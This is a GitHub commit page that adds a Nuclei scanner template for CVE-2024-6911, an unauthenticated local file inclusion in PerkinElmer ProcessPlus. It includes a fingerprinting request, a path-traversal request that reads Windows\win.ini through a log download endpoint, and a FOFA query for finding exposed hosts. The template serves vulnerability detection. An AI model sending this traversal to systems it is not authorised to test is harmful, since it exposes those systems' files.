Skip to content

Commit

Permalink
Merge pull request #10586 from Kazgangap/CVE-2024-6911
Browse files Browse the repository at this point in the history
  • Loading branch information
ritikchaddha committed Aug 29, 2024
2 parents e39e1af + a02e682 commit b9773ef
Showing 1 changed file with 56 additions and 0 deletions.
56 changes: 56 additions & 0 deletions http/cves/2024/CVE-2024-6911.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
id: CVE-2024-6911

info:
name: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
author: s4e-io
severity: high
description: |
Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus through 1.11.6507.0.
reference:
- http://seclists.org/fulldisclosure/2024/Jul/13
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6911
- https://github.com/adminlove520/pocWiki
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
cvss-score: 8.7
cve-id: CVE-2024-6911
cwe-id: CWE-552
epss-score: 0.00043
epss-percentile: 0.09524
cpe: cpe:2.3:a:perkinelmer:processplus:1.11.6507:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: perkinelmer
product: processplus
fofa-query: '"Process Plus" && icon_hash="1772087922"'
tags: cve,cve2024,processplus,intrusive,lfi,seclists

flow: http(1) && http(2)

http:
- raw:
- |
GET /ProcessPlus HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>Process Plus - Perten Instruments</title>")'
- 'status_code == 200'
condition: and
internal: true

- raw:
- |
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and

0 comments on commit b9773ef

Please sign in to comment.